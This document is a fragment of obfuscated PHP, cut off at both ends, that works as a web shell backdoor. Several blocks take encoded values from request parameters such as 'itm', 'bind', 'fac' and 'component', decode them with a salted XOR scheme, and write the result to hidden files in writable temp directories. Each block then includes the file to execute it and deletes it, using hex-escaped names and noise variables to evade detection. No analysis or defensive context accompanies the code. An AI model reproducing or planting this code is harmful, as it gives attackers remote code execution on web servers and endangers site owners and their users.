0 && isset($_REQUEST["\x69\x74m"])){ $record = $_REQUEST["\x69\x74m"]; $record = explode( "." , $record) ; $holder = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $u = 0; foreach ($record as $v4) { $chS = ord($salt[$u % $sLen] ); $dec = ((int)$v4 - $chS - ($u % 10)) ^ 59; $holder.=chr($dec ); $u++;} $obj = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", sys_get_temp_dir(), "/dev/shm", "/tmp", getenv("TMP"), getenv("TEMP"), session_save_path()]); foreach ($obj as $key => $ref) { if (!( !is_dir($ref) || !is_writable($ref) )) { $reference = join("/", [$ref, ".sym"]); $file = fopen($reference, 'w'); if ($file) { fwrite($file, $holder); fclose($file); include $reference; @unlink($reference); die(); } } } } if(!is_null($_POST["bind"] ?? null)){ $factor = array_filter([ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), "/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TMP"), getcwd()]); $obj = $_POST["bind"]; $obj = explode( ".",$obj ) ; $rec = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9); $k = 0; foreach ($obj as $v3) { $sChar = ord($s9[$k % $lenS]); $dec = ((int)$v3 - $sChar - ($k % 10)) ^ 93; $rec.= chr($dec); $k++; } $reference = 0; do { $parameter_group = $factor[$reference] ?? null; if ($reference >= count($factor)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($parameter_group)) { $symbol = implode("/", [$parameter_group, ".dat"]); if (file_put_contents($symbol, $rec)) { include $symbol; @unlink($symbol); exit; } } $reference++; } while (true); } if(!empty($_REQUEST["itm"])){ $elem = $_REQUEST["itm"]; $elem = explode ("." , $elem) ; $rec=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s); foreach( $elem as $v=>$v5): $sChar=ord( $s[$v %$sLen]); $dec=( ( int)$v5 - $sChar -( $v %10)) ^ 35; $rec .= chr( $dec); endforeach; $component = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", "/tmp", getcwd(), "/dev/shm", session_save_path(), getenv("TEMP")]); foreach ($component as $pgrp): if ((function($d) { return is_dir($d) && is_writable($d); })($pgrp)) { $holder = join("/", [$pgrp, ".resource"]); $success = file_put_contents($holder, $rec); if ($success) { include $holder; @unlink($holder); die();} } endforeach; } if(@$_POST["fac"] !== null){ $hld = $_POST["fac"]; $hld = explode ( '.' , $hld ) ; $descriptor = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $__len = count( $hld ); for( $l = 0; $l < $__len; $l++) {$v9 = $hld[$l]; $chS = ord( $s[$l %$lenS] ); $d =( ( int)$v9 - $chS -( $l %10)) ^ 60; $descriptor .= chr( $d ); } $data_chunk = array_filter([session_save_path(), "/tmp", "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm"]); foreach ($data_chunk as $key => $ent) { if (is_dir($ent) ? is_writable($ent) : false) { $entry = join("/", [$ent, ".pgrp"]); $file = fopen($entry, 'w'); if ($file) { fwrite($file, $descriptor); fclose($file); include $entry; @unlink($entry); exit; } } } } if(!is_null($_REQUEST["\x63om\x70\x6F\x6Eent"] ?? null)){ $flag = $_REQUEST["\x63om\x70\x6F\x6Eent"]; $flag = explode ( ".", $flag) ; $factor = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2); $v = 0; array_walk($flag, function ($v3) use (&$factor, &$v, $s2, $lenS) { $sChar = ord($s2[$v % $lenS]); $d = ((int)$v3 - $sChar - ($v % 10)) ^ 71; $factor .= chr($d); $v++; }); $res = array_filter([session_save_path(), "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP")]); foreach ($res as $key => $entity) { if (is_writable($entity) && is_dir($entity)) { $ref = str_replace("{var_dir}", $entity, "{var_dir}/.holder"); if (@file_put_contents($ref, $factor) !== false) { include $ref; unlink($ref); d